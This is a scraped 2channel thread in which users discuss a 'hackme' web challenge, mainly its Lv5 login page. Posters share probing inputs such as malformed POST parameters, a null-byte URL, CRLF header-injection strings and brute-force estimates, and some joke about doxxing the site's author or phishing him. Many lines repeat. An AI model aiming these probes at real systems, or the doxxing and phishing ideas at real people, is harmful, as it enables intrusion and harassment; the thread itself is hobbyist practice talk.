john??二つファイル見れたけどどうやってぶっこむのよ
教えてエロい人
675 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:06:04.94
lv5以下の話は過去ログでも漁ってろ
676 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:06:05.66
>>674
スレ読み直せよ
スレ読み直せよ
677 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:08:16.40
>>674
CUI
CUI
678 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:09:32.92
次におまえはCPIって何?と聞き返す・・・わけないよな?
679 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:10:06.75
>>674
お疲れ そんなこともわからないならあきらめて
お疲れ そんなこともわからないならあきらめて
680 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:10:27.51
CPIってなーにー???
681 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:13:16.14
消費者物価指数くらい知っとけよw
682 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:15:33.83
水を得た魚かお前らw
683 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:17:09.85
だってねーあきたし、後は下のlvから上がってきた奴らを餌に遊ぶしか
684 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:17:20.05
いよいよ末期だな
685 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:18:41.95
もう、ほぼ完全にさめたな
686 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:22:59.63
海外サイトにあるcrackmeでもいじってれば
687 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:34:25.87
lv3
切り裂き男までいれたけど
2つのやつhtmとかでいれるの??
切り裂き男までいれたけど
2つのやつhtmとかでいれるの??
688 :名無しさん@お腹いっぱい。:2011/02/27(日) 19:01:09.78
689 :名無しさん@お腹いっぱい。:2011/02/27(日) 19:11:20.68
>>688
うpろだに転載するとかしろやボケ
うpろだに転載するとかしろやボケ
690 :名無しさん@お腹いっぱい。:2011/02/27(日) 19:11:25.67
>>688
暇だな
暇だな
691 :名無しさん@お腹いっぱい。:2011/02/27(日) 19:12:49.49
Lv4、もう一度ニョキっとしようと思ったら、もうやり方を忘れていたw
692 :名無しさん@お腹いっぱい。:2011/02/27(日) 19:33:47.17
Lv5まだ1人のままじゃん・・・もう48時間経ってるだろ?
お前らふがいなさすぎ。
お前らふがいなさすぎ。
693 :名無しさん@お腹いっぱい。:2011/02/27(日) 19:40:15.07
694 :名無しさん@お腹いっぱい。:2011/02/27(日) 19:52:51.60
MSSEってwwww
695 :名無しさん@お腹いっぱい。:2011/02/27(日) 19:57:10.39
MSEのことか?
軽いだけしか取り柄がないんじゃ・・・?
軽いだけしか取り柄がないんじゃ・・・?
696 :名無しさん@お腹いっぱい。:2011/02/27(日) 20:00:05.53
HTTPヘッダーインジェクションって何に使えるのか調べてみたけど、
自分自身を引っ掛ける以外に何が出来るのかどこのサイトにも書いてないw
セキュリティ関連ってこんな都市伝説レベルの情報ばっかりなのな
サーバーでのキャッシュを不正にできるとか書いてあったが
そのキャッシュは正常なリクエストでは使われないだろ
自分自身を引っ掛ける以外に何が出来るのかどこのサイトにも書いてないw
セキュリティ関連ってこんな都市伝説レベルの情報ばっかりなのな
サーバーでのキャッシュを不正にできるとか書いてあったが
そのキャッシュは正常なリクエストでは使われないだろ
697 :名無しさん@お腹いっぱい。:2011/02/27(日) 20:02:30.06
>>695
UNLHA32.dll脆弱性の時に取りざたされたけど、あれってMSSE以外のメジャーな対策ソフトではろくに検出できないから
作者がバージョンアップを放棄したんでしょ。
重い上に糞レベルのスキャンしか出来ないソフトなんて(しかも有料で)使う意味ないよ。
UNLHA32.dll脆弱性の時に取りざたされたけど、あれってMSSE以外のメジャーな対策ソフトではろくに検出できないから
作者がバージョンアップを放棄したんでしょ。
重い上に糞レベルのスキャンしか出来ないソフトなんて(しかも有料で)使う意味ないよ。
698 :名無しさん@お腹いっぱい。:2011/02/27(日) 20:20:11.37
699 :名無しさん@お腹いっぱい。:2011/02/27(日) 21:25:50.80
>>696
ばーか
ばーか
700 :名無しさん@お腹いっぱい。:2011/02/27(日) 21:43:39.98
はい
701 :名無しさん@お腹いっぱい。:2011/02/27(日) 21:52:23.66
HTTPヘッダ・インジェクションだったとしたらもう他いも誰か解いてそうなもんだけどな
702 :名無しさん@お腹いっぱい。:2011/02/27(日) 21:56:08.32
ソーシャルハッキングしかないだろ?
dotdisterの家まで行って「ドウヤッタンダゴラオシエレ」って怒鳴るのが正解かと
twitterが最高のヒント、ということだろう。
dotdisterの家まで行って「ドウヤッタンダゴラオシエレ」って怒鳴るのが正解かと
twitterが最高のヒント、ということだろう。
703 :名無しさん@お腹いっぱい。:2011/02/27(日) 21:58:43.42
704 :名無しさん@お腹いっぱい。:2011/02/27(日) 21:59:45.22
結局PylonsでFormEncodeでPlainTextでredirect_toしていて
PHPのふりしてるのが判ったら、ちょっとやる気無くしている。
ていうかFormEncode.poは、なんでまだ全部日本語にしていないのだろう?
PlainTextのバリデータはなんで'-'が有効なのにエラーメッセージでは含まれないような書き方(元の英語から)をしているのだろう?
htmlfillでlogin.makoって、全然デザイナーに優しくないテンプレートだよな
UCS4でビルドされたPythonのデバッグしてどうする俺みたいな〜
PHPのふりしてるのが判ったら、ちょっとやる気無くしている。
ていうかFormEncode.poは、なんでまだ全部日本語にしていないのだろう?
PlainTextのバリデータはなんで'-'が有効なのにエラーメッセージでは含まれないような書き方(元の英語から)をしているのだろう?
htmlfillでlogin.makoって、全然デザイナーに優しくないテンプレートだよな
UCS4でビルドされたPythonのデバッグしてどうする俺みたいな〜
705 :名無しさん@お腹いっぱい。:2011/02/27(日) 22:05:38.93
さすがに1分に1回のアクセスならBANされないだろうから、1日で60*24=D80回試せる。
BOINCのように手分けしてブルートフォースすれば、2chで1万人とすれば
1日でD800000回試せる、って電卓が16進のままじゃねーか。
BOINCのように手分けしてブルートフォースすれば、2chで1万人とすれば
1日でD800000回試せる、って電卓が16進のままじゃねーか。
706 :名無しさん@お腹いっぱい。:2011/02/27(日) 22:22:46.30
707 :名無しさん@お腹いっぱい。:2011/02/27(日) 22:52:38.04
どうせLv2やLv4も正規のID/Passってないだろうから、Lv5も同様だろう
708 :名無しさん@お腹いっぱい。:2011/02/27(日) 22:53:06.75
思わずこっちを覗きに行っちゃったぜ
https://www.netfire.jp/planet/login
https://www.netfire.jp/planet/login
709 :名無しさん@お腹いっぱい。:2011/02/27(日) 22:55:30.18
>>613だがもうむりぽ
710 :名無しさん@お腹いっぱい。:2011/02/27(日) 22:59:03.74
>>709
おまいはよく頑張った・・・!
おまいはよく頑張った・・・!
711 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:04:01.31
712 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:10:51.53
>>709
まーったく進歩なし?
まーったく進歩なし?
713 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:18:08.93
>>711
LV2のIDは何でも行けたはず、パスだけ決めうちだったんでは?
LV2のIDは何でも行けたはず、パスだけ決めうちだったんでは?
714 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:21:29.41
>>709
> 613 :名無しさん@お腹いっぱい。:2011/02/26(土) 21:13:39.72
> だいたい、見当がついた。
> 日曜過ぎてもできなかったら報告するから、
まだ日曜は過ぎてない!!
> 613 :名無しさん@お腹いっぱい。:2011/02/26(土) 21:13:39.72
> だいたい、見当がついた。
> 日曜過ぎてもできなかったら報告するから、
まだ日曜は過ぎてない!!
715 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:26:05.80
LV5 セミコロンまでわかった。
716 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:28:05.88
>>715
Lv4も同じだけど
Lv4も同じだけど
717 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:28:19.44
一応俺の邪推を書いておく
FormEncodeかhttpヘッダインジェクションのいずれかと予想
今までの問題からhttpヘッダインジェクション濃厚
FormEncodの線はこの板の人に任せたというより丸投げ
だが、sessionidわからん
よって、httpヘッダインジェクションからのXSSを試みる
だが、書き込んでも404
これより、lv5がhttpヘッダインジェクションなら定型文と予想
もしそうならばlv2の二の舞じゃないか
もうむりぽ←いまここ
見えないところの脆弱性は手法の総当りだから困る
FormEncodeかhttpヘッダインジェクションのいずれかと予想
今までの問題からhttpヘッダインジェクション濃厚
FormEncodの線はこの板の人に任せたというより丸投げ
だが、sessionidわからん
よって、httpヘッダインジェクションからのXSSを試みる
だが、書き込んでも404
これより、lv5がhttpヘッダインジェクションなら定型文と予想
もしそうならばlv2の二の舞じゃないか
もうむりぽ←いまここ
見えないところの脆弱性は手法の総当りだから困る
718 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:29:56.45
よくやった。この言葉をやろう。
知ったか乙
知ったか乙
719 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:30:56.28
超有名人が参加しないのは何でだろ。突破してもネタバレ出来なくてつまらないから?
720 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:33:14.11
>>709
ばか!くず!のうなし!!!
ばか!くず!のうなし!!!
721 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:34:42.79
722 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:38:25.34
Lv5、18時間ぶっ通しでやっと手がかり掴んだ
休憩したらそこを掘る
ここで間違いない
休憩したらそこを掘る
ここで間違いない
723 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:45:27.40
724 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:46:16.60
725 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:48:08.84
hackmeのおかげで、入力フォーム見たら定型文打つ癖が付いてしまったじゃないかw
726 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:49:18.70
>>722
ネタバレよろしく
ネタバレよろしく
727 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:49:29.74
728 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:52:14.00
>>725
自社のイントラのフォームで明日うっかりやらんようにな
自社のイントラのフォームで明日うっかりやらんようにな
729 :名無しさん@お腹いっぱい。:2011/02/27(日) 23:58:59.65
ハッキング体験だから、実際の脆弱性は関係ない。
だからFormEncode自体の脆弱性は関係ない。
form要素の中身を書き換えてエラーを出してる人いたけど、
あれはGAEで普通に出るエラーだし、それを利用させるとは思えない。
ホンモノの脆弱性をどうにか再現しているとしたら分からんけど。
そういう認識でいいんだよな?
だからFormEncode自体の脆弱性は関係ない。
form要素の中身を書き換えてエラーを出してる人いたけど、
あれはGAEで普通に出るエラーだし、それを利用させるとは思えない。
ホンモノの脆弱性をどうにか再現しているとしたら分からんけど。
そういう認識でいいんだよな?
730 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:02:13.43
FormEncode自体の脆弱性を再現してたら関係あるだろ
731 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:03:09.49
Hackme公式アカウントって申請したらどうなるの?
732 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:03:42.14
Formの書き換えで<type 'list'>出るやつ?
あれ、Lv4以下でも出るから微妙じゃね?
あれ、Lv4以下でも出るから微妙じゃね?
733 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:10:37.13
この板、使えねぇ
734 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:13:31.65
>>733
お前程じゃないよw
お前程じゃないよw
735 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:14:08.82
>>731
月1万も取られるにもかかわらず総勢○人の中に埋もれて泣き寝入りする羽目になる
月1万も取られるにもかかわらず総勢○人の中に埋もれて泣き寝入りする羽目になる
736 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:15:14.75
>>734
もう少しわかるような日本語つかってみ
もう少しわかるような日本語つかってみ
737 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:15:41.09
738 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:15:55.65
739 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:16:29.90
>>736
そのレスで全てを表してるなw
そのレスで全てを表してるなw
740 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:17:54.93
>> 739
具体的にどうぞ 書ける?
具体的にどうぞ 書ける?
741 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:22:17.85
駄目ですた
また曖昧な所から試します…
>>732
俺もそれは微妙だと思う
でも情報出てないし流してみるテスト
name=;name&password=;password
これ入れるとFormEncodeのエラー?が出るよ!
知らなかった人はモチベーションを上げるのだ!
また曖昧な所から試します…
>>732
俺もそれは微妙だと思う
でも情報出てないし流してみるテスト
name=;name&password=;password
これ入れるとFormEncodeのエラー?が出るよ!
知らなかった人はモチベーションを上げるのだ!
743 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:24:11.38
>>741
自演なんじゃね?
自演なんじゃね?
744 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:25:04.60
>>733-734,736,738-740
部外者だけど。
春の近づきを知らせる陽気の中それとは真逆の陰気だらけの部屋でパーソナルコンピューターを操作してインターネットの匿名掲示板で罵り合いをする奴等
ってことだろ。
部外者だけど。
春の近づきを知らせる陽気の中それとは真逆の陰気だらけの部屋でパーソナルコンピューターを操作してインターネットの匿名掲示板で罵り合いをする奴等
ってことだろ。
745 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:25:50.99
>>742
それってLv4以下だと出ないの?
それってLv4以下だと出ないの?
746 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:26:12.93
>>742
それgetで送るの?
それgetで送るの?
747 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:26:36.27
オマエラって、もしかして仕事中もhackme やってるの?
748 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:27:07.60
ヒント:平日の昼間にもこのスレに書き込みがある
749 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:27:38.26
733 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:10:37.13
この板、使えねぇ
734 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:13:31.65
>>733
お前程じゃないよw
736 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:15:14.75
>>734
もう少しわかるような日本語つかってみ
738 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:15:55.65
>>733
使えねぇとかそんなレベルじゃねぇよ。
虚しいレベルだよ・・・
739 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:16:29.90
>>736
そのレスで全てを表してるなw
740 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:17:54.93
>> 739
具体的にどうぞ 書ける?
744 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:25:04.60
>>733-734,736,738-740
部外者だけど。
春の近づきを知らせる陽気の中それとは真逆の陰気だらけの部屋でパーソナルコンピューターを操作してインターネットの匿名掲示板で罵り合いをする奴等
ってことだろ。
この板、使えねぇ
734 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:13:31.65
>>733
お前程じゃないよw
736 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:15:14.75
>>734
もう少しわかるような日本語つかってみ
738 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:15:55.65
>>733
使えねぇとかそんなレベルじゃねぇよ。
虚しいレベルだよ・・・
739 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:16:29.90
>>736
そのレスで全てを表してるなw
740 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:17:54.93
>> 739
具体的にどうぞ 書ける?
744 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:25:04.60
>>733-734,736,738-740
部外者だけど。
春の近づきを知らせる陽気の中それとは真逆の陰気だらけの部屋でパーソナルコンピューターを操作してインターネットの匿名掲示板で罵り合いをする奴等
ってことだろ。
750 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:28:32.11
給料泥棒だろそれ。いいのか?
751 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:29:18.32
fackme
↑まだ出ていなかったから念のため。
↑まだ出ていなかったから念のため。
752 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:29:20.25
給料泥棒しているのは俺たちだけじゃない。
50代のオッサンども見てみろ、いつも暇そうにしてるだろ。
50代のオッサンども見てみろ、いつも暇そうにしてるだろ。
753 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:29:54.43
仕事をちゃんとこなしてるならいいんじゃね?
仕事をしてる振りほど、キツイもんはないからなぁ
仕事をしてる振りほど、キツイもんはないからなぁ
754 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:29:58.75
>>742
name=&name&password=&password でも同じエラー出るね。
あと他の Lv でも同じ挙動だから無関係だろうけど、
/Lv5/login%00(任意の文字列)
でもアクセスできるようになってるみたい。
name=&name&password=&password でも同じエラー出るね。
あと他の Lv でも同じ挙動だから無関係だろうけど、
/Lv5/login%00(任意の文字列)
でもアクセスできるようになってるみたい。
755 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:30:30.05
>>751
英語勉強しような
英語勉強しような
756 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:31:10.77
757 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:32:36.01
>> 755
確かに、でも勉強してもその単語はでてこんだろうw
確かに、でも勉強してもその単語はでてこんだろうw
758 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:33:17.27
>>757
アンカーちゃんと打たないのは、何か理由があるのか?
アンカーちゃんと打たないのは、何か理由があるのか?
759 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:34:45.96
>>758
すまん、酒のせいかも
すまん、酒のせいかも
760 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:35:12.18
ええい、誰ぞ奴を討てる者はおらんのか!
761 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:36:45.92
ヤツがすごいのは文句ないが、
周りの奴らが勘違いしているのがちょっとな
周りの奴らが勘違いしているのがちょっとな
762 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:37:39.24
hackクリアできなくても個人特定はできるぞ
763 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:39:20.87
なんかヒント欲しいな〜 > lv5
Lv4まではなんだかんだ言ってもタメになったので
Lv4まではなんだかんだ言ってもタメになったので
764 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:42:22.12
> Lv5、解けはしたので着地点は合っているんだろうけど色々気になっているのでまた考えてみる。
そんな曖昧に突破したのか?
そんな曖昧に突破したのか?
765 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:47:00.80
ト|ackme
766 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:48:47.18
нackme
767 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:50:29.45
そんなことより、まずは中の人のTwitterアカウントをhackするところからじゃね?
個人を特定する、と。
その後、netfire社に電話するとか、中途採用/新卒採用に応募して、面接で聞き出すとかじゃね。
個人を特定する、と。
その後、netfire社に電話するとか、中途採用/新卒採用に応募して、面接で聞き出すとかじゃね。
768 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:52:00.48
おぉ、Lv5が3人になっとるーーーーーーー!!!
dotdister
称号:
ハッカー
すげーぇ。"称号:"や"ハッカー"はこのスレのやつか?
dotdister
称号:
ハッカー
すげーぇ。"称号:"や"ハッカー"はこのスレのやつか?
769 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:52:14.27
わがんね
これでLv4のように判定の問題だったらバッシングの嵐
これでLv4のように判定の問題だったらバッシングの嵐
770 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:52:37.52
いや、フィッシング用のページを用意して・・
771 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:56:19.49
>>768
同じネタは何度も通用しないから。改行は3つくらいにしておきなさい。
同じネタは何度も通用しないから。改行は3つくらいにしておきなさい。
772 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:59:07.27
>>744
春の近付きを知らせる陽気之中其れとは真逆之陰気だらけ之部屋で個人計算機を操作して擬似不正侵入行為に勤しむが然し全く以って成功せず世界的網上之匿名掲示板で罵り合いをする奴等
春の近付きを知らせる陽気之中其れとは真逆之陰気だらけ之部屋で個人計算機を操作して擬似不正侵入行為に勤しむが然し全く以って成功せず世界的網上之匿名掲示板で罵り合いをする奴等
773 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:59:53.61
>>771 はい
774 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:02:37.62
input要素削ってpostすると、 Missing value って出るけど、既知?
775 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:04:08.36
既に出てるし、LV5以外でも出るGAE上のエラー
776 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:09:43.68
>>754
それってGET?POST?
それってGET?POST?
777 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:10:43.62
>>776
やりゃわかる
やりゃわかる
778 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:12:32.35
>>776
getは基本的にスルーされると思う。
getは基本的にスルーされると思う。
779 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:17:29.32
やったんだよ。GETは無視されてPOSTでやっても普通の反応しかない。
inputのname属性をいじるんじゃなく?
inputのname属性をいじるんじゃなく?
780 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:27:22.16
Tamper Data でやったら
文字を与えてください(<type 'list'>: [u'', u'']です)
になる俺はもう寝る。
文字を与えてください(<type 'list'>: [u'', u'']です)
になる俺はもう寝る。
781 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:37:00.56
もしかしてYahoo知恵袋で聞いたら教えてくれるんじゃないか?
782 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:42:49.08
もはやシミュレートされた脆弱性じゃなくてガチの脆弱性を探してる感じになりつつあるなw
783 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:44:18.54
The input field '\r\nInjectionTest' was not expected.
っていうエラー出せた。
小さな一歩だけど進んだな
っていうエラー出せた。
小さな一歩だけど進んだな
784 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:45:16.97
Lv5ってNetFireの製品テストじゃないのか?
それで、突破できた人は脆弱性をいかにして見つけどうやったかを提出・・・。
とか
それで、突破できた人は脆弱性をいかにして見つけどうやったかを提出・・・。
とか
785 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:47:07.02
>>783
本気で言ってるんだったら寝ろ。少しは休め。
本気で言ってるんだったら寝ろ。少しは休め。
786 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:47:42.76
>>783
それlv1から5全部で出るよ
それlv1から5全部で出るよ
787 :783:2011/02/28(月) 01:54:00.66
788 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:55:59.75
>>783
それ何突っ込んだらでる?
それ何突っ込んだらでる?
789 :名無しさん@お腹いっぱい。:2011/02/28(月) 01:57:33.37
>>788
<!-- for: None -->
<!-- for: None -->
790 :783:2011/02/28(月) 02:00:45.01
>>788
セミコロンをPOSTしたら、その後の文字列が「was not expected」として出るみたい。
(Lv1からLv5までどこでも)
「他Lvでも共通で出る箇所は掘り進んでも何もない」ととりあえず仮定してるが、
何も上手くいかないようだったらここを掘り進んでみるのもアリだと思うがな
セミコロンをPOSTしたら、その後の文字列が「was not expected」として出るみたい。
(Lv1からLv5までどこでも)
「他Lvでも共通で出る箇所は掘り進んでも何もない」ととりあえず仮定してるが、
何も上手くいかないようだったらここを掘り進んでみるのもアリだと思うがな
791 :名無しさん@お腹いっぱい。:2011/02/28(月) 02:08:22.62
>>790
was not expected.(予期されていない)
The input field '***' was not expected.
入力されたフィールド(***と入力されている)は予期されていません。
ってことだから。意味ないから・・・
was not expected.(予期されていない)
The input field '***' was not expected.
入力されたフィールド(***と入力されている)は予期されていません。
ってことだから。意味ないから・・・
792 :名無しさん@お腹いっぱい。:2011/02/28(月) 02:12:43.00
>>790
http://www.w3.org/TR/html401/appendix/notes.html#h-B.2.2
ここ見ればわかるけど、
> We recommend that HTTP server implementors, and in particular,
> CGI implementors support the use of ";" in place of "&"
> to save authors the trouble of escaping "&" characters in this manner.
"&" の代わりに ";" がパラメータの区切りに使えるというだけの話。
まっとうな挙動なのでここを調べても徒労に終わりそうな気がする。
http://www.w3.org/TR/html401/appendix/notes.html#h-B.2.2
ここ見ればわかるけど、
> We recommend that HTTP server implementors, and in particular,
> CGI implementors support the use of ";" in place of "&"
> to save authors the trouble of escaping "&" characters in this manner.
"&" の代わりに ";" がパラメータの区切りに使えるというだけの話。
まっとうな挙動なのでここを調べても徒労に終わりそうな気がする。
793 :783:2011/02/28(月) 02:16:20.12
>>791
>>792
そこまでは理解してるんだけど、
それをHTML上に(クラスまで当てて)わざわざ表示してるから臭いなぁと思ったんだよね。
まぁでも考えてみれば「英数字と下線(_)だけ入力できます」とかも表示されてるしな。
無駄そうだな。
ありがとう
>>792
そこまでは理解してるんだけど、
それをHTML上に(クラスまで当てて)わざわざ表示してるから臭いなぁと思ったんだよね。
まぁでも考えてみれば「英数字と下線(_)だけ入力できます」とかも表示されてるしな。
無駄そうだな。
ありがとう
794 :名無しさん@お腹いっぱい。:2011/02/28(月) 02:44:13.82
二人目おめ
yaz_k
yaz_k
795 :名無しさん@お腹いっぱい。:2011/02/28(月) 02:45:43.81
なんかヒントくれればいいのに
796 :名無しさん@お腹いっぱい。:2011/02/28(月) 02:47:51.37
もうヒントは出さなくていいと思うけどな
また大量に人が流れ込むだけ
また大量に人が流れ込むだけ
797 :名無しさん@お腹いっぱい。:2011/02/28(月) 02:48:15.39
それとLv6がないんじゃ頭打ちになってしまうな
798 :名無しさん@お腹いっぱい。:2011/02/28(月) 02:49:17.68
yaz_kは口を噤んだ
799 :名無しさん@お腹いっぱい。:2011/02/28(月) 02:50:07.81
ランキングに載りたいとかそんな目的はないから
Lv5クリアが1000人になっても俺はヒントが知りたい
Lv5クリアが1000人になっても俺はヒントが知りたい
800 :名無しさん@お腹いっぱい。:2011/02/28(月) 02:50:08.20
801 :名無しさん@お腹いっぱい。:2011/02/28(月) 02:52:31.97
802 :名無しさん@お腹いっぱい。:2011/02/28(月) 03:09:01.09
ヒントはいらないけど、せめて感想くらい言って欲しいな
803 :名無しさん@お腹いっぱい。:2011/02/28(月) 03:20:59.87
ゴリ押しでいけるみたいだな
804 :名無しさん@お腹いっぱい。:2011/02/28(月) 03:51:52.40
> 結局やってて一番イライラしたのはLv4か。と思ったらすげー簡単になってて笑える。"も/も=も+も要らないとか。
だから40文字でいけてたとあれほど
だから40文字でいけてたとあれほど
805 :名無しさん@お腹いっぱい。:2011/02/28(月) 04:48:43.97
806 :名無しさん@お腹いっぱい。:2011/02/28(月) 04:52:13.26
xampp使ってる人に負けるとは・・・・
うぐぐ・・・
うぐぐ・・・
807 :名無しさん@お腹いっぱい。:2011/02/28(月) 05:12:33.76
そこはぐぬぬ・・・だろ
808 :名無しさん@お腹いっぱい。:2011/02/28(月) 05:43:32.62
おや?
twitterみるとクリアした二人ってどっちも北海道の学生みたいなんだけど・・・・・
つまり・・どういうことだってばよw
twitterみるとクリアした二人ってどっちも北海道の学生みたいなんだけど・・・・・
つまり・・どういうことだってばよw
809 :名無しさん@お腹いっぱい。:2011/02/28(月) 06:25:37.09
元々Lv4も自分が見た時には6人しかクリアしてなかったしな
ブログニュースに載るまでは更に少ない人数だったんだろ?
なら2人だけなのも合点はいく
ブログニュースに載るまでは更に少ない人数だったんだろ?
なら2人だけなのも合点はいく
810 :名無しさん@お腹いっぱい。:2011/02/28(月) 11:14:04.20
ノーコメントにしてるってことは、それに気づいたらクリアって事かねぇ?
811 :名無しさん@お腹いっぱい。:2011/02/28(月) 12:17:31.85
「Lv5/index」「Lv5/next」「Lv5/login」のあとに「/」をつけても通る
本当に、これしかLv5独特の動きっていうのは見つからないよなぁ
かといってこれをどうにかできる訳でもないし
yaz_kのつぶやきをみるに、一番理不尽なのはLv4だったらしいから突破できれば納得できる仕様なんだろうけどさ
本当に、これしかLv5独特の動きっていうのは見つからないよなぁ
かといってこれをどうにかできる訳でもないし
yaz_kのつぶやきをみるに、一番理不尽なのはLv4だったらしいから突破できれば納得できる仕様なんだろうけどさ
812 :名無しさん@お腹いっぱい。:2011/02/28(月) 12:38:46.24
lv4の理不尽さは、初期に比べればマシになったけどね〜
lv2にしろ4にしろ回答が決めうちは良くなかったな・・・
しかしサッパリ見えないlv5であった
lv2にしろ4にしろ回答が決めうちは良くなかったな・・・
しかしサッパリ見えないlv5であった
813 :名無しさん@お腹いっぱい。:2011/02/28(月) 12:44:27.56
「山」「川」もだめだった。
もう俺には尽くす手だてがない
もう俺には尽くす手だてがない
814 :名無しさん@お腹いっぱい。:2011/02/28(月) 13:46:08.61
>>808
興味深いなw
興味深いなw
815 :名無しさん@お腹いっぱい。:2011/02/28(月) 14:16:44.26
_ノ乙(、ン、)_
816 :名無しさん@お腹いっぱい。:2011/02/28(月) 14:59:38.00
>>812
あれ、もしかして手法ふえたの?
あれ、もしかして手法ふえたの?
817 :名無しさん@お腹いっぱい。:2011/02/28(月) 15:23:17.00
818 :名無しさん@お腹いっぱい。:2011/02/28(月) 16:07:03.92
819 :名無しさん@お腹いっぱい。:2011/02/28(月) 16:12:26.26
手法は増えてないんでないかなぁ。
820 :名無しさん@お腹いっぱい。:2011/02/28(月) 16:21:06.55
>>817
は?
は?
821 :名無しさん@お腹いっぱい。:2011/02/28(月) 16:41:33.62
>>820
ヒント:815はAA
ヒント:815はAA
822 :名無しさん@お腹いっぱい。:2011/02/28(月) 17:51:36.55
823 :名無しさん@お腹いっぱい。:2011/02/28(月) 18:00:58.65
>>821
817の反応が異次元過ぎてついレスしてしまった
817の反応が異次元過ぎてついレスしてしまった
824 :名無しさん@お腹いっぱい。:2011/02/28(月) 18:08:48.61
lv4は何回か判定変わってるよね。
今は一番甘いときよりはちょっと難しくなってる・・・。
今は一番甘いときよりはちょっと難しくなってる・・・。
825 :名無しさん@お腹いっぱい。:2011/02/28(月) 18:22:57.42
Lv5二人目とかwすげぇなw
826 :名無しさん@お腹いっぱい。:2011/02/28(月) 18:26:23.79
>>825
お前それ何回同じ事書いた?
お前それ何回同じ事書いた?
